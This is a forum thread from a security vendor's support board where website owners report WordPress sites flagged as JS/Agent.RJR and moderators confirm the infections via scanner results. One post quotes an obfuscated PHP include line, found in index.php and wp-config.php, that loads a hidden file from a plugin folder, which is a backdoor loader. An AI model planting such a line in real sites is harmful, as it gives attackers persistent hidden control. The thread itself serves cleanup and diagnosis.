Website is blocked by ESET with a JS/Agent.rjr Trojan Warning

[kichus 0]

The following WordPress website https://infinitumpartners.com.au/ is blocked by ESET with a JS.Agent.rjr trojan warning. It's only showing for users with ESET installed and loading fine for other website users. We have all the plugin and Core files up-to-date and have Security plugins installed. None of the internal scans showing any malicious codes present. Could you please help us to locate the actual issue. It is critical as it's our business is affected. 

Thank you so much in advance. 

[Marcos 5,088]

The website was compromised and contains the JS malware detected by ESET:

https://sitecheck.sucuri.net/results/https/infinitumpartners.com.au

[kichus 0]

Thank you so much for your quick reply. We have seen this report already but are not seeing any traces of this code in the source code nor in DB. Could you please help us how to locate the code and also is it any location specific? Thank you in advance. 

[Marcos 5,088]

Unfortunately we can't tell. We don't provide website cleaning and monitoring services nor have access to your web server and database. We merely scan the html code downloaded from the Internet.

[kichus 0]

Thank you. appreciate your time. 

[itman 1,667]

40 minutes ago, Glassertje said:

The website is working here. No warning.

Same here using Firefox.

However, Sucuri detects web site injection. It could be Eset Secure Browser mode for EIS and ESSP is blocking the code injection.

It also appears to be an infected WorkPress plug-in, http://infinitumpartners.com.au/wp-content/uploads/2021/11/OTP2-Dark-overlay-60.jpg?id=3552

[Marcos 5,088]

No detection now either. I recollect that the Sucuri scanner caches results for some time, ie. it's still showing the malicious code even if it has been removed today.

[MicroS 0]

HI.

On my website https://pgmprzemysl.pl ESET detects JS/Agent.RJR.

I scanned website on VirtusTotal (https://www.virustotal.com/gui/url/a62fdc26b3fcd54a45a5d1a3e431f154fade046c29fdc57a70438839ec9f92d4) but scanner shows that everything is clean.

I found something like

$r9 = "//wp\x2dcontent/plug\x69ns/dupl\x69cate\x2dpage/.e6da785f.ccss"; strpos($r9, 't5y'); @include_once /* p2bc */ ($r9);

in index.php and wp-config.php files and I removed this, but still JS/Agent.RJR is somewhere detected.

What else should I check?

[Marcos 5,088]

2 hours ago, MicroS said:

What else should I check?

Please refer to https://sitecheck.sucuri.net/results/https/pgmprzemysl.pl.

[itman 1,667]

24 minutes ago, Marcos said:

Please refer to https://sitecheck.sucuri.net/results/https/pgmprzemysl.pl.

Sucuri is detecting magneto malware; namely malware.magento_shoplift.38.1. Refer to this article: https://labs.sucuri.net/signatures/sitecheck/malware-magento_shoplift-38-1/ .

[kandrea 0]

Same here, on uphotelbudapest.com. We try to find and delete the infected files, and now ESET doesn't block website but sucuri still write this:

Warning: Malware Detected

Infected with malware. Immediate action is required

 

What could we do?

[Marcos 5,088]

8 minutes ago, kandrea said:

Same here, on uphotelbudapest.com. We try to find and delete the infected files, and now ESET doesn't block website but sucuri still write this:

Warning: Malware Detected

Infected with malware. Immediate action is required

The website is indeed infected and needs to be cleaned:

https://sitecheck.sucuri.net/results/uphotelbudapest.com

[itman 1,667]

1 hour ago, Marcos said:

The website is indeed infected and needs to be cleaned:

https://sitecheck.sucuri.net/results/uphotelbudapest.com

Looks like the web site is no longer infected. Neither Sucuri or Eset detect any malware.

[Raxel 0]

Seems I'm getting the warning from https://www.lifelabs.com/ for agent.RJR. A bit scary, as it's a gateway to medical records.  Any chance it's not a valid threat?

[Marcos 5,088]

5 hours ago, Raxel said:

Seems I'm getting the warning from https://www.lifelabs.com/ for agent.RJR. A bit scary, as it's a gateway to medical records.  Any chance it's not a valid threat?

The website is indeed infected:

[Raxel 0]

7 hours ago, Marcos said:

The website is indeed infected:

Thank you!  That could be a bad one, for sure.  

[AmadeusConcept 0]

Hello,

 

The following WordPress website https://le-blog-des-leaders.com.

is blocked by ESET with a JS.Agent.rjr trojan warning. It's only showing for users with ESET installed and loading fine for other website users. We have all the plugin and Core files up-to-date and have Security plugins installed in Wordpress.

None of the internal scans showing any malicious codes present.

Could you please help us to locate the actual issue. It is critical as it's our business is affected. 

Thank you so much in advance. 

[Marcos 5,088]

12 minutes ago, AmadeusConcept said:

is blocked by ESET with a JS.Agent.rjr trojan warning. It's only showing for users with ESET installed and loading fine for other website users. We have all the plugin and Core files up-to-date and have Security plugins installed in Wordpress.

The website is indeed infected:

https://sitecheck.sucuri.net/results/https/le-blog-des-leaders.com

[Bruno777 0]

We have the same problem on our website: https:aripar.org.

Validated at https://sitecheck.sucuri.net/results/https/aripar.org there is no problem. Only blocked by ESET users

[Marcos 5,088]

8 hours ago, Bruno777 said:

We have the same problem on our website: https:aripar.org.

Validated at https://sitecheck.sucuri.net/results/https/aripar.org there is no problem. Only blocked by ESET users

The website is indeed infected: